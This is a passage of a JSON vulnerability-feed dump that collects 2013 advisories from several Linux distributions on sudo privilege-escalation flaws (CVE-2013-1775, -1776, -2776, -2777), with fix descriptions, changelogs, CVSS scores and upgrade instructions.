to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file.\nAn attacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs:\n\n* Previously, sudo did not support netgroup filtering for sources from the\nSystem Security Services Daemon (SSSD). Consequently, SSSD rules were\napplied to all users even when they did not belong to the specified\nnetgroup. With this update, netgroup filtering for SSSD sources has been\nimplemented. As a result, rules with a netgroup specification are applied\nonly to users that are part of the netgroup. (BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a command,\nit reset the value of the RLIMIT_NPROC resource limit to the parent's value\nof this limit if both the soft (current) and hard (maximum) values of\nRLIMIT_NPROC were not limited. An upstream patch has been provided to\naddress this bug and RLIMIT_NPROC can now be set to \"unlimited\".\n(BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was not\nlogged to the /var/log/secure file as before. Consequently, user name\n\"root\" was always recorded instead of the real user name. With this update,\nthe previous behavior of sudo has been restored. As a result, the expected\nuser name is now written to /var/log/secure. (BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a buffer\noverflow could have occurred in certain cases. This condition has been\nfixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements:\n\n* With this update, sudo has been modified to send debug messages about\nnetgroup matching to the debug log. These messages should provide better\nunderstanding of how sudo matches netgroup database records with values\nfrom the running system and what the values are exactly. (BZ#848111)\n\n* With this update, sudo has been modified to accept the ipa_hostname value\nfrom the /etc/sssd/sssd.conf configuration file when matching netgroups.\n(BZ#853542)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues and add\nthese enhancements.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-November/007294.html\n\n**Affected packages:**\nsudo\nsudo-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1701.html", "edition": 3, "modified": "2013-11-26T13:33:00", "published": "2013-11-26T13:33:00", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-November/007294.html", "id": "CESA-2013:1701", "title": "sudo security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:28:59", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "**CentOS Errata and Security Advisory** CESA-2013:1353\n\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file. An\nattacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs:\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the /etc/sudoers\nfile as cycles. Consequently, a warning message about undefined aliases\nappeared. This bug has been fixed, /etc/sudoers is now parsed correctly by\nvisudo and the warning message no longer appears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers file\ncorrectly if it contained an Active Directory (AD) group. The file was\nparsed only up to the first AD group information and then the parsing\nfailed with the following message:\n\n sudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l' now\nparses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary authentication\nmechanism, users were not able to authenticate on that system. With this\nupdate, sudo has been modified to process LDAP and AD names correctly and\nthe authentication process now works as expected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly parsed\ncertain alias definitions. Consequently, an error message was issued. The\nbug has been fixed, and parsing errors no longer occur when using 'visudo\n-s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-October/007077.html\n\n**Affected packages:**\nsudo\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1353.html", "edition": 3, "modified": "2013-10-07T13:01:59", "published": "2013-10-07T13:01:59", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-October/007077.html", "id": "CESA-2013:1353", "title": "sudo security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:03", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file. An\nattacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs:\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the /etc/sudoers\nfile as cycles. Consequently, a warning message about undefined aliases\nappeared. This bug has been fixed, /etc/sudoers is now parsed correctly by\nvisudo and the warning message no longer appears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers file\ncorrectly if it contained an Active Directory (AD) group. The file was\nparsed only up to the first AD group information and then the parsing\nfailed with the following message:\n\n sudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l' now\nparses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary authentication\nmechanism, users were not able to authenticate on that system. With this\nupdate, sudo has been modified to process LDAP and AD names correctly and\nthe authentication process now works as expected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly parsed\ncertain alias definitions. Consequently, an error message was issued. The\nbug has been fixed, and parsing errors no longer occur when using 'visudo\n-s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\n", "modified": "2017-09-08T12:06:27", "published": "2013-09-30T20:52:28", "id": "RHSA-2013:1353", "href": "https://access.redhat.com/errata/RHSA-2013:1353", "type": "redhat", "title": "(RHSA-2013:1353) Low: sudo security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-2776", "CVE-2013-2777"], "description": "The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file.\nAn attacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs:\n\n* Previously, sudo did not support netgroup filtering for sources from the\nSystem Security Services Daemon (SSSD). Consequently, SSSD rules were\napplied to all users even when they did not belong to the specified\nnetgroup. With this update, netgroup filtering for SSSD sources has been\nimplemented. As a result, rules with a netgroup specification are applied\nonly to users that are part of the netgroup. (BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a command,\nit reset the value of the RLIMIT_NPROC resource limit to the parent's value\nof this limit if both the soft (current) and hard (maximum) values of\nRLIMIT_NPROC were not limited. An upstream patch has been provided to\naddress this bug and RLIMIT_NPROC can now be set to \"unlimited\".\n(BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was not\nlogged to the /var/log/secure file as before. Consequently, user name\n\"root\" was always recorded instead of the real user name. With this update,\nthe previous behavior of sudo has been restored. As a result, the expected\nuser name is now written to /var/log/secure. (BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a buffer\noverflow could have occurred in certain cases. This condition has been\nfixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements:\n\n* With this update, sudo has been modified to send debug messages about\nnetgroup matching to the debug log. These messages should provide better\nunderstanding of how sudo matches netgroup database records with values\nfrom the running system and what the values are exactly. (BZ#848111)\n\n* With this update, sudo has been modified to accept the ipa_hostname value\nfrom the /etc/sssd/sssd.conf configuration file when matching netgroups.\n(BZ#853542)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues and add\nthese enhancements.\n", "modified": "2018-06-06T20:24:30", "published": "2013-11-21T05:00:00", "id": "RHSA-2013:1701", "href": "https://access.redhat.com/errata/RHSA-2013:1701", "type": "redhat", "title": "(RHSA-2013:1701) Low: sudo security, bug fix and enhancement update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:10", "bulletinFamily": "unix", "cvelist": ["CVE-2010-5107", "CVE-2012-0786", "CVE-2012-0787", "CVE-2012-4453", "CVE-2012-6542", "CVE-2012-6545", "CVE-2013-0221", "CVE-2013-0222", "CVE-2013-0223", "CVE-2013-0242", "CVE-2013-0343", "CVE-2013-1775", "CVE-2013-1813", "CVE-2013-1914", "CVE-2013-1928", "CVE-2013-1929", "CVE-2013-2164", "CVE-2013-2234", "CVE-2013-2776", "CVE-2013-2777", "CVE-2013-2851", "CVE-2013-2888", "CVE-2013-2889", "CVE-2013-2892", "CVE-2013-3231", "CVE-2013-4238", "CVE-2013-4242", "CVE-2013-4332", "CVE-2013-4344", "CVE-2013-4345", "CVE-2013-4387", "CVE-2013-4419", "CVE-2013-4591", "CVE-2013-4592"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nUpgrade Note: If you upgrade the Red Hat Enterprise Virtualization\nHypervisor through the 3.2 Manager administration portal, the Host may\nappear with the status of \"Install Failed\". If this happens, place the host\ninto maintenance mode, then activate it again to get the host back to an\n\"Up\" state.\n\nA buffer overflow flaw was found in the way QEMU processed the SCSI \"REPORT\nLUNS\" command when more than 256 LUNs were specified for a single SCSI\ntarget. A privileged guest user could use this flaw to corrupt QEMU process\nmemory on the host, which could potentially result in arbitrary code\nexecution on the host with the privileges of the QEMU process.\n(CVE-2013-4344)\n\nMultiple flaws were found in the way Linux kernel handled HID (Human\nInterface Device) reports. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2013-2888, CVE-2013-2889, CVE-2013-2892)\n\nA flaw was found in the way the Python SSL module handled X.509 certificate\nfields that contain a NULL byte. An attacker could potentially exploit this\nflaw to conduct man-in-the-middle attacks to spoof SSL servers. Note that\nto exploit this issue, an attacker would need to obtain a carefully crafted\ncertificate signed by an authority that the client trusts. (CVE-2013-4238)\n\nThe default OpenSSH configuration made it easy for remote attackers to\nexhaust unauthorized connection slots and prevent other users from being\nable to log in to a system. This flaw has been addressed by enabling random\nearly connection drops by setting MaxStartups to 10:30:100 by default.\nFor more information, refer to the sshd_config(5) man page. (CVE-2010-5107)\n\nThe CVE-2013-4344 issue was discovered by Asias He of Red Hat.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2012-0786 and CVE-2012-0787 (augeas issues)\n\nCVE-2013-1813 (busybox issue)\n\nCVE-2013-0221, CVE-2013-0222, and CVE-2013-0223 (coreutils issues)\n\nCVE-2012-4453 (dracut issue)\n\nCVE-2013-4332, CVE-2013-0242, and CVE-2013-1914 (glibc issues)\n\nCVE-2013-4387, CVE-2013-0343, CVE-2013-4345, CVE-2013-4591, CVE-2013-4592,\nCVE-2012-6542, CVE-2013-3231, CVE-2013-1929, CVE-2012-6545, CVE-2013-1928,\nCVE-2013-2164, CVE-2013-2234, and CVE-2013-2851 (kernel issues)\n\nCVE-2013-4242 (libgcrypt issue)\n\nCVE-2013-4419 (libguestfs issue)\n\nCVE-2013-1775, CVE-2013-2776, and CVE-2013-2777 (sudo issues)\n\nThis update also fixes the following bug:\n\n* A previous version of the rhev-hypervisor6 package did not contain the\nlatest vhostmd package, which provides a \"metrics communication channel\"\nbetween a host and its hosted virtual machines, allowing limited\nintrospection of host resource usage from within virtual machines. This has\nbeen fixed, and rhev-hypervisor6 now includes the latest vhostmd package.\n(BZ#1026703)\n\nThis update also contains the fixes from the following errata:\n\n* ovirt-node: https://rhn.redhat.com/errata/RHBA-2013-1528.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.\n", "modified": "2018-06-07T08:59:39", "published": "2013-11-21T05:00:00", "id": "RHSA-2013:1527", "href": "https://access.redhat.com/errata/RHSA-2013:1527", "type": "redhat", "title": "(RHSA-2013:1527) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "**Issue Overview:**\n\nA flaw was found in the way sudo handled time stamp files. An attacker able to run code as a local user and with the ability to control the system clock could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password. ([CVE-2013-1775 __](<https://access.redhat.com/security/cve/CVE-2013-1775>))\n\nIt was found that sudo did not properly validate the controlling terminal device when the tty_tickets option was enabled in the /etc/sudoers file. An attacker able to run code as a local user could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password. ([CVE-2013-2776 __](<https://access.redhat.com/security/cve/CVE-2013-2776>), [CVE-2013-2777 __](<https://access.redhat.com/security/cve/CVE-2013-2777>))\n\n \n**Affected Packages:** \n\n\nsudo\n\n \n**Issue Correction:** \nRun _yum update sudo_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n sudo-devel-1.8.6p3-12.17.amzn1.i686 \n sudo-debuginfo-1.8.6p3-12.17.amzn1.i686 \n sudo-1.8.6p3-12.17.amzn1.i686 \n \n src: \n sudo-1.8.6p3-12.17.amzn1.src \n \n x86_64: \n sudo-devel-1.8.6p3-12.17.amzn1.x86_64 \n sudo-1.8.6p3-12.17.amzn1.x86_64 \n sudo-debuginfo-1.8.6p3-12.17.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-12-11T20:34:00", "published": "2013-12-11T20:34:00", "id": "ALAS-2013-259", "href": "https://alas.aws.amazon.com/ALAS-2013-259.html", "title": "Low: sudo", "type": "amazon", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "[1.8.6p3-12]\r\n- added patches for CVE-2013-1775 CVE-2013-2777 CVE-2013-2776\r\n Resolves: rhbz#1015355\r\n \n[1.8.6p3-11]\r\n- sssd: fixed a bug in ipa_hostname processing\r\n Resolves: rhbz#853542\r\n \n[1.8.6p3-10]\r\n- sssd: fixed buffer size for the ipa_hostname value\r\n Resolves: rhbz#853542\r\n \n[1.8.6p3-9]\r\n- sssd: match against ipa_hostname from sssd.conf too when\r\n checking sudoHost\r\n Resolves: rhbz#853542\r\n \n[1.8.6p3-8]\r\n- updated man-page\r\n- fixed handling of RLIMIT_NPROC resource limit\r\n- fixed alias cycle detection code\r\n- added debug messages for tracing of netgroup matching\r\n- fixed aborting on realloc when displaying allowed commands\r\n- show the SUDO_USER in logs, if running commands as root\r\n- sssd: filter netgroups in the sudoUser attribute\r\n Resolves: rhbz#856901\r\n Resolves: rhbz#947276\r\n Resolves: rhbz#886648\r\n Resolves: rhbz#994563\r\n Resolves: rhbz#848111\r\n Resolves: rhbz#994626\r\n Resolves: rhbz#973228\r\n Resolves: rhbz#880150", "edition": 4, "modified": "2013-11-25T00:00:00", "published": "2013-11-25T00:00:00", "id": "ELSA-2013-1701", "href": "http://linux.oracle.com/errata/ELSA-2013-1701.html", "title": "sudo security, bug fix and enhancement update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:56", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2777", "CVE-2013-2776"], "description": "[1.7.2p1-28]\r\n- backported fixes for CVE-2013-1775 CVE-2013-1776 CVE-2013-2776 CVE-2013-2777\r\n Resolves: rhbz#968221\r\n \n[1.7.2p1-27]\r\n- visudo: fixed incorrect warning and parse error regarding\r\n undefined aliases which were in fact defined\r\n Resolves: rhbz#849679\r\n Resolves: rhbz#905624\r\n \n[1.7.2p1-26]\r\n- updated sudoers man-page to clarify the behavior of the user\r\n negation operator and the behavior of wildcard matching in command\r\n specifications\r\n Resolves: rhbz#846118\r\n Resolves: rhbz#856902\r\n \n[1.7.2p1-25]\r\n- fixed regression in escaping of sudo -i arguments\r\n Resolves: rhbz#853203\r\n \n[1.7.2p1-24]\r\n- bump release number\r\n \n[1.7.2p1-23]\r\n- Fixed caching of user and group names\r\n- Backported RFC 4515 escaping of LDAP queries\r\n Resolves: rhbz#855836\r\n Resolves: rhbz#869287", "edition": 4, "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "ELSA-2013-1353", "href": "http://linux.oracle.com/errata/ELSA-2013-1353.html", "title": "sudo security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:17", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2777", "CVE-2013-2776"], "description": "### Background\n\nsudo allows a system administrator to give users the ability to run commands as other users. Access to commands may also be granted on a range to hosts. \n\n### Description\n\nMultiple vulnerabilities have been found in sudo:\n\n * sudo does not correctly validate the controlling terminal on a system without /proc or when the tty_tickets option is enabled. \n * sudo does not properly handle the clock when it is set to the epoch.\n\n### Impact\n\nA local attacker with sudo privileges could connect to the stdin, stdout, and stderr of the terminal of a user who has authenticated with sudo, allowing the attacker to hijack the authorization of the other user. Additionally, a local or physically proximate attacker could set the system clock to the epoch, bypassing time restrictions on sudo authentication. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll sudo users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/sudo-1.8.6_p7\"", "edition": 1, "modified": "2014-01-21T00:00:00", "published": "2014-01-21T00:00:00", "id": "GLSA-201401-23", "href": "https://security.gentoo.org/glsa/201401-23", "type": "gentoo", "title": "sudo: Privilege escalation", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
